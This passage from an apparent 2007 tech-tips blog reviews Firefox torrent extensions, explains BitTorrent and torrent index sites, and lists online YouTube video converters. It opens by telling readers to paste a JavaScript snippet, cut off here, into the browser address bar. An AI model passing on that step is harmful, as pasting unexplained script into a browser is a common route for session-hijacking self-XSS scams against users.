3) Past this Javascript into the address bar (Where you write addresses of sites like www.google.com)
4) Press Enter Or Click Go

See the Magic...
Hope you enjoy it...
and don't forget to give the feed back so i keep on posting such tricks...

downloader

Download Torrent Files in Firefox - FoxTorrent and FireTorrent Review
Here's another reason why Firefox browser is the fastest growing browser in the world. You can now download torrent files using Firefox if you have the extension installed. Meaning you can avoid installing and using BitTorrent clients such as Azureus, uTorrent, BitComet and etc... Currently I only found two extensions that is able to download torrent files using Firefox. It is FoxTorrent and FireTorrent.

Tried them both and this is what I have to say about FoxTorrent and FireTorrent.

I tested both the extensions by downloading OpenOffice. OpenOffice torrent has enough seeders to max out my download speed.




FireTorrent is the world's first BitTorrent plugin for the Wyzo and Firefox web browsers. Suitable for novice and advanced users, FireTorrent allows you to download torrents without the hassle of a 3rd party application. The FireTorrent plugin includes the very latest technologies and standards to ensure that your download completes quickly and reliably, including advanced features such as STUNT connections, uPnP NAT traversal, uTorrent compatible peer exchange, and many many more!

FireTorrent is able to maxed out my download speed at nearly 100KB/s.

The only drawback about FireTorrent is I can't resume the download if I cancel the it. Resuming download should be the basic feature that every torrent client to have. BitTorrent technology was developed to distribute large files and what if we got disconnected at 90% from a 10GB download? That'd be frustrating!

FireTorrent is able to handle downloads very well and there are options such as Port, Download/Upload Rate, Encrypt BitTorrent Connections, Proxy which you can configure. FireTorrent would be a very good Firefox torrent extension if it is able to support resume downloads.

[ Download FireTorrent ]


FoxTorrent is an open-source Firefox extension that lets you stream torrents as they download, from your web browser, with zero configuration needed. It said to be Streaming Fast Delivery, Background Downloading, Complete Firefox Integration, Low Resource Footprint, Works on Windows, Mac, and Ubuntu Linux and Configuration-Free.

There is nothing to configure in FoxTorrent. You can't find any options at all other than the download location. It will be good if it works perfectly but if it doesn't, you can't do anything about it. FoxTorrent claims to makes its best effort to auto-configure NAT boxes but it didn't work for me. I spent 30 minutes downloading OpenOffice and the fastest speed I got was 10KB/s. That's nearly 10 times slower than FireTorrent! After reading Foxtorrent FAQ, I found out that FoxTorrent uses port 9420. I manually forwarded port 9420 but the download speed didn't improve.


One more thing about FoxTorrent is, it supports pausing and resuming torrent downloads.

[ Download FoxTorrent ]

FireTorrent is fast but without resume capability. FoxTorrent is slow and it's supports resuming. If you ask me which I'd prefer to use, I'd say NEITHER one and I'd stick with uTorrent. Well, if FireTorrent is able to support resuming, I might use FireTorrent.



Subscribe to Net Crackers by Email
Posted by Anique Akhtar at 2:17 AM 0 comments

Labels: downloader, firefox


Saturday, April 21, 2007
Download Videos from YouTube in Popular Video Formats!



YouTube.com is a popular video hosting website, which streams user uploaded videos in Flash. Since it is streamed you can't download videos. One of best & easiest hack to download these videos is "kissyoutube" described at "Devil's Workshop". In this you need to prefix "kiss" to the video URL & download video in FLV format. Here you need either FLV player to watch that video or FLV converter to convert into a popular video format. It will be so good if you can download video in popular video format like .AVI. Here we go:


Got to http://vixy.net/
Enter video URL to be downloaded
Select video format. You can choose between four formats AVI,MOV,MP4,3gp(for Mobile) & MP3(audio only).
It will automatically check for embedded video & starts converting to the format you have chosen.
Click download!

It also works for other site like Google Video!
How is that!!


Subscribe to Net Crackers by Email
Posted by Anique Akhtar at 2:15 AM 1 comments

Labels: downloader, youtube


Friday, April 13, 2007
How to use BitTorrent
BitTorrent is a Peer-To-Peer protocol for file sharing. Bittorrent is a way to distribute large amounts of data without the original distributor having bear the entire cost of hardware, resources, etc. With Bittorrent, instead of one person distributing the files to everyone, as more and more people recieve the files, they also become distributors. Eventually, after the file has been downloaded to many computers, a new download may get bits and pieces of the file from hundreds of users.

This method of file sharing reduces the burden on any one particular source and ensures redudancy becuase a download is not depending on only one source having the file.

A BitTorrent client is a program that uses the BitTorrent protocol and is capable of creating, requesting and transferring any computer file over the network. In order to share files with other, a peer (computer wil BitTorrent software installed) creates a "torrent". A torrent is a small file that contains meta data about which files are to be shared and the tracker, the computer that coordinates the file distriution.

In order to use BitTorrent to download files, you need to install a BitTorrent client on your computer first. Here is a list of clients:

1. uTorrent - This is my favorite becuase it's tiny (only 640KB) and it works great! It also has an RSS reader now, so you can browse around also while downloading.



2. Azureus - This is another popular BitTorrent client based on Java. It has a much nicer interface along with high resoultion content. Also a good choice.



Once you have installed your BitTorrent client, you need to find the torrents! You have several choices of which I'll mention just two:

1. Torrentz.com - Type in your query and you'll get a large listed sorted in order from top to bottom in terms of largest number of seeders. Seeders are basically people who have the files on their computers and are uploading the file to others. The more seeders, the faster the download. You'll get a list of sites that are tracking the file, so click on one of the sites on the list and it'll open that page with the link to download the torrent.

2. ISOHunt.com - Another good site, however be warned that all of these sites except a certain type of user and therefore you will see lots of nice "sex" related ads on the pages. They are not complete porn, but some are close!

Click Download Torrent and the file will automatically open in your BitTorrent client! And that's it! It usually takes a little while for the speed to become faster because using BitTorrent, the program has to find other peers and that takes time.

Top Ten Online Video Converters

Top Ten Online Video Converters

Have you ever wanted to convert online videos to your desired format without downloading any software ?

These Top 10 Online Video Converters can help to convert videos from your favorite video websites to your desired format to Run on your PC, Mobile or an iPod.

1. Vixy.net - Online Free FLV Converter. It can convert YouTube videos to Popular Video formats like AVI, DivX, MOV, MPEG4, 3GP,MP4, MP3, iPod Video and PSP Video. Files are converted instantly and it shows the Ajax conversion progress bar.

2. ZamZar: Free Online file conversion service. It can convert your online videos to a number of video formats. The converted files are sent via email.

3. FLVix : FLVix can Convert videos from YouTube, Google Video or directly from .FLV file. Supported formats are AVI, MOV, 3GP, MP3, MP4.

4. All2Convert : It can convert videos from Youtube. You can also upload FLV files from PC. Very fast video conversion.

5. Tubefish : Tubefish video converter can convert your videos instantly to MPEG, AVI, MOV, 3GP and Divx.

6. Movavi : Movavi is another online video converter. It notifies via email when converted files are ready to download.

7. VideoCodeZone - It can convert videos from Youtube, daily motion, break, metacafe. Supports various popular video formats.

8. Media Converter : Media Convert is an online media converter. It requires registration for converting videos from youtube.

9. Vconvert : Vconvert can Convert online flv and youtube videos to compatible formats for your iPod/iPhone, mobile phone.

10. Convert Tube : Another Instant Online Video Converter. It can convert videos to MP3, MP4, MOV and 3GP.